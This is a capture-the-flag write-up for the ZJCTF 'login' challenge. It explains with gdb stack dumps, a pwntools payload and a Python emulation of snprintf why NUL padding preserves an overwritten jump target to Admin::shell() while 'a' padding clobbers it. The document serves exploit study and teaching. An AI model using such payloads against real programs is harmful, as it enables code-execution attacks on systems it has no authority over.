
ZJCTF_ login

2022-07-27 03:47:00 Morphy_ Amo

The challenge itself is not difficult, and the full solving process can be found in other people's write-ups. Here I mainly want to record one thing that puzzled me while solving it.

When constructing the payload, why does padding with 'a' make the program crash, while padding with '\x00' works fine?

The call that matters is this snprintf:

0x400a39    call   snprintf@plt                      <snprintf@plt>

First, let's look at the case of padding with 'a':

from pwn import p64   # pwntools

payload = b'2jctf_pa5sw0rd\0'                        # the password, followed by a NUL
payload = payload.ljust(0x48, b'a') + p64(0x400e88)  # pad up to the slot at buf+0x48 (see the stack dump), then the address of Admin::shell()

Right before the snprintf call the stack looks like this. 0x7ffe95152a98 holds the address we want to jump to. Note that rdi (the destination buffer) and rcx (the first vararg, i.e. the %s argument) both point at 0x7ffe95152a50, the buffer that holds our password:

00:0000│ rsp        0x7ffe95152a30 —▸ 0x7ffe95152ab0 —▸ 0x7ffe95152c00 —▸ 0x400eb0 (__libc_csu_init) ◂— push   r15
01:0008│            0x7ffe95152a38 —▸ 0x7ffe95152b38 ◂— '2jctf_pa5sw0rd'
02:0010│            0x7ffe95152a40 —▸ 0x6021b8 (login+88) ◂— '2jctf_pa5sw0rd'
03:0018│            0x7ffe95152a48 —▸ 0x7ffe95152ad0 —▸ 0x7ffe95152a98 —▸ 0x400e88 (Admin::shell()) ◂— push   rbp
04:0020│ rcx rdi r8 0x7ffe95152a50 ◂— '2jctf_pa5sw0rd'
05:0028│            0x7ffe95152a58 ◂— 0x6100647230777335 /* '5sw0rd' */
06:0030│            0x7ffe95152a60 ◂— 0x6161616161616161 ('aaaaaaaa')
... ↓               6 skipped
0d:0068│            0x7ffe95152a98 —▸ 0x400e88 (Admin::shell()) ◂— push   rbp
0e:0070│            0x7ffe95152aa0 ◂— 0x0
0f:0078│            0x7ffe95152aa8 ◂— 0x8efdc4a1c20f1800
10:0080│ rbp        0x7ffe95152ab0 —▸ 0x7ffe95152c00 —▸ 0x400eb0 (__libc_csu_init) ◂— push   r15
11:0088│            0x7ffe95152ab8 —▸ 0x400bd8 (main+261) ◂— mov    eax, 0

After the call, the original stack layout is destroyed: snprintf writes its output into that same buffer at 0x7ffe95152a50, and with the 'a' padding the output is long enough to run over 0x7ffe95152a98. The string only ends at the NUL at 0x7ffe95152a9f, i.e. 0x50 bytes were written starting from 0x7ffe95152a50:

09:0048│     0x7ffe95152a78 ◂— 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
... ↓        3 skipped
0d:0068│     0x7ffe95152a98 ◂— 0x61616161616161 /* 'aaaaaaa' */
0e:0070│     0x7ffe95152aa0 ◂— 0x0

snprintf stops reading a %s argument at the first \x00. Here the %s argument is the destination buffer itself, so by the time the %s is processed, the literal "Password accepted: " has already been written over the first 19 bytes of the buffer. When we pad with \x00, the byte right after that prefix (offset 19) is a NUL, so the string snprintf produces in the buffer is just "Password accepted: Password accepted: \n", 39 bytes, which is not long enough to reach the address we placed at offset 0x48. The jump target survives and getshell succeeds. With 'a' padding there is no NUL until the address bytes themselves, the copied string is much longer, and the write is cut off only by snprintf's size limit, after it has already clobbered 0x7ffe95152a98 with 'aaaaaaa\0'.
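To make the difference concrete, here is an added Python model of what the snprintf call does when the %s argument is the destination buffer itself, as the register dump shows (rdi and rcx both point at 0x7ffe95152a50). This is not code from the write-up and the challenge's source is not on this page: it assumes the format string is "Password accepted: %s\n" and that the size argument of the snprintf call is 0x50, which matches the NUL at 0x7ffe95152a9f in the second dump. Overlapping source and destination is undefined behaviour in C; the model follows glibc's order of operations (literal text is written into the destination first, then the %s argument is measured with strlen and copied), which is what produces the doubled prefix seen in gdb.

```python
import struct

PASSWORD = b"2jctf_pa5sw0rd"
SLOT_OFF = 0x48                  # distance from the password buffer to the slot holding the jump target
SHELL_ADDR = 0x400e88            # Admin::shell()
PREFIX = b"Password accepted: "  # literal part of the format string quoted in the write-up
SNPRINTF_SIZE = 0x50             # assumption: size argument of the snprintf call (NUL lands at buf+0x4f, as in the dump)


def build_payload(pad: bytes) -> bytes:
    """Same construction as the write-up: password, NUL, padding up to the slot, target address."""
    return (PASSWORD + b"\0").ljust(SLOT_OFF, pad) + struct.pack("<Q", SHELL_ADDR)


def emulate_snprintf(buf: bytearray, size: int) -> int:
    """Model of snprintf(buf, size, "Password accepted: %s\n", buf): the %s argument
    is the destination itself (rdi == rcx in the gdb dump). Overlap like this is
    undefined in C; the model follows glibc's order of operations: every piece of
    output goes straight into the destination, and the %s argument is measured with
    strlen() only when the conversion is reached, so it already sees the prefix
    that was just written over the start of the buffer. Returns the length that
    snprintf would report (everything it tried to write, before truncation)."""
    written = 0

    def emit(data: bytes) -> None:
        nonlocal written
        room = max(0, size - 1 - written)          # bytes still allowed before the NUL
        chunk = data[:room]
        buf[written:written + len(chunk)] = chunk
        written += len(data)

    emit(PREFIX)
    arg_len = buf.index(0)                         # strlen() of the aliased argument
    emit(bytes(buf[:arg_len]))                     # snapshot, then copy
    emit(b"\n")
    buf[min(written, size - 1)] = 0                # terminating NUL is always placed
    return written


def run(pad: bytes):
    """Lay the payload out as it sits on the stack, run the aliased snprintf and
    return (reported length, resulting bytes, value now in the slot at buf+0x48)."""
    # constructed stack image: payload at offset 0, zeros past the slot
    stack = bytearray(build_payload(pad).ljust(0x60, b"\0"))
    n = emulate_snprintf(stack, SNPRINTF_SIZE)
    slot = struct.unpack_from("<Q", stack, SLOT_OFF)[0]
    return n, bytes(stack), slot


if __name__ == "__main__":
    for pad in (b"\0", b"a"):
        n, stack, slot = run(pad)
        state = "intact" if slot == SHELL_ADDR else "CLOBBERED"
        print(f"pad={pad!r}: snprintf length {n}, slot at +0x48 = {slot:#x} ({state})")
        print("   ", stack[:min(n, SNPRINTF_SIZE)])
```

Running it shows the two outcomes side by side: with \x00 padding the buffer ends up as "Password accepted: Password accepted: \n" and the slot at +0x48 still holds 0x400e88; with 'a' padding the copy is cut off by the size limit at +0x4f, and the slot now reads 'aaaaaaa\0', exactly the 0x61616161616161 value in the second dump.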


Copyright notice
This article was written by Morphy_ Amo. Please include the original link when reposting. Thank you.
https://yzsam.com/2022/208/202207270005377125.html